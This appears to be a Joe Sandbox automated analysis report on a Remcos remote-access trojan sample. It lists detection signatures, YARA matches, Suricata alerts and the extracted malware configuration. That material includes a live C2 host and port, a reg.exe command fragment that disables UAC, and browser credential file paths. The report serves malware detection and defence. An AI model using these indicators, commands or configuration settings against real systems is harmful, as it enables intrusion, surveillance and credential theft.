Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe

Overview

General Information

Sample name:1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
Analysis ID:1559856
MD5:3cc6b6ef2d90a55b3a9cb4b2f9c1526c
SHA1:fbc78cbbc06ab9f435fd3ec2fc46cf3a8c433dcf
SHA256:eafb4332827f8e2eccc30716537cfb9fdc3112b369d519b1fdfd9c5b39b8f1ce
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["remcos2025rem.duckdns.org:1213:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8AGIM5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\remcos\registros.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x134b8:$a1: Remcos restarted by watchdog!
                • 0x13a30:$a3: %02i:%02i:%02i:%03i
                00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Click to see the 8 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                      0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6aab8:$a1: Remcos restarted by watchdog!
                        • 0x6b030:$a3: %02i:%02i:%02i:%03i
                        0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x64b7c:$str_b2: Executing file:
                        • 0x65bfc:$str_b3: GetDirectListeningPort
                        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x65728:$str_b7: \update.vbs
                        • 0x64ba4:$str_b9: Downloaded file:
                        • 0x64b90:$str_b10: Downloading file:
                        • 0x64c34:$str_b12: Failed to upload file:
                        • 0x65bc4:$str_b13: StartForward
                        • 0x65be4:$str_b14: StopForward
                        • 0x65680:$str_b15: fso.DeleteFile "
                        • 0x65614:$str_b16: On Error Resume Next
                        • 0x656b0:$str_b17: fso.DeleteFolder "
                        • 0x64c24:$str_b18: Uploaded file:
                        • 0x64be4:$str_b19: Unable to delete:
                        • 0x65648:$str_b20: while fso.FileExists("
                        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                        Click to see the 7 entries

                        Stealing of Sensitive Information

                        barindex
                        Source: Registry Key setAuthor: Joe Security: Data: Details: 3E F8 30 34 D6 27 C1 DC 90 1A E7 A8 E0 04 5F 96 3A BD 87 01 AC 44 9F 9A 23 1E DE E8 BC 77 ED FA 79 F0 09 42 14 C9 D3 2F FD 91 8E 00 8E 15 A4 D5 83 F9 05 24 B5 76 4A A2 B1 EF 37 B6 C4 86 63 C3 33 B7 4C DB 8B 4A 91 1C CA FC 00 E0 2B A2 1A 2F 03 29 6C 31 63 30 4B B4 7E B6 ED 63 CB 01 80 6F B7 E5 6A 5D F9 43 CE 60 CF C4 38 91 F0 BE 9E 28 6C C2 64 4A 3E C8 4B B7 7B 47 FE 8D C5 4E BA 2F 53 40 8E D0 B8 EC ED 87 D4 95 E3 9B 48 22 38 B7 D8 51 3B 92 26 86 68 F1 02 5C 00 31 45 A1 B5 99 55 10 F8 EC 3F FE 4C 3C F8 6C 62 8C 5C DD F4 52 58 63 99 09 77 EB 22 B5 15 24 0D 5D 72 E6 CD 16 8B 64 65 B6 EE 7E 16 86 DF F8 23 80 C6 66 5E 01 C8 80 CF 76 85 24 14 E2 F7 B3 01 04 29 EF A7 C1 DB 6D E8 BF 79 C4 A9 25 1E 11 60 59 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, ProcessId: 5000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-8AGIM5\exepath
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T01:07:03.504324+010020365941Malware Command and Control Activity Detected192.168.2.549704186.169.34.1901213TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T01:07:06.213772+010028033043Unknown Traffic192.168.2.549705178.237.33.5080TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeAvira: detected
                        Source: remcos2025rem.duckdns.orgAvira URL Cloud: Label: malware
                        Source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["remcos2025rem.duckdns.org:1213:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8AGIM5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeReversingLabs: Detection: 86%
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeVirustotal: Detection: 86%Perma Link
                        Source: Yara matchFile source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_004338C8
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a7eec4ca-9

                        Exploits

                        barindex
                        Source: Yara matchFile source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00407538 _wcslen,CoGetObject,0_2_00407538
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49704 -> 186.169.34.190:1213
                        Source: Malware configuration extractorURLs: remcos2025rem.duckdns.org
                        Source: unknownDNS query: name: remcos2025rem.duckdns.org
                        Source: global trafficTCP traffic: 192.168.2.5:49704 -> 186.169.34.190:1213
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: COLOMBIATELECOMUNICACIONESSAESPCO COLOMBIATELECOMUNICACIONESSAESPCO
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49705 -> 178.237.33.50:80
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B411
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: remcos2025rem.duckdns.org
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.0000000000694000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000694000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(1
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp91n
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.0000000000683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000000_2_0040A2F3
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168FC
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A41B
                        Source: Yara matchFile source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041CA73 SystemParametersInfoW,0_2_0041CA73

                        System Summary

                        barindex
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
